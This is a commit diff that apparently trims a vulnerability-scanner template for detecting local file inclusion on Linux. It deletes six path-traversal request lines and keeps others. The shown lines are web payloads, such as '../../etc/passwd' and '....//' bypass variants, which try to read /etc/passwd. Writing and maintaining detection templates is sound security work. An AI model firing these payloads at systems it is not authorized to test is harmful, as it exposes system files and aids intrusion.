Update generic-linux-lfi.yaml

patch-1
Prince Chaddha 2022-09-02 01:48:37 +05:30 committed by GitHub
parent 5e0f3a4229
commit f0d0eff9ca
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 0 additions and 6 deletions

View File

@ -47,12 +47,6 @@ requests:
- "{{BaseURL}}/index.php?page=../../etc/passwd"
- "{{BaseURL}}/index.php?page=....//....//etc/passwd"
- "{{BaseURL}}/../../../../../../../../../etc/passwd"
- "{{BaseURL}}/../../../../../../../../etc/passwd"
- "{{BaseURL}}/../../../../../../../etc/passwd"
- "{{BaseURL}}/../../../../../../etc/passwd"
- "{{BaseURL}}/../../../../../etc/passwd"
- "{{BaseURL}}/../../../../etc/passwd"
- "{{BaseURL}}/../../../etc/passwd"
stop-at-first-match: true
matchers: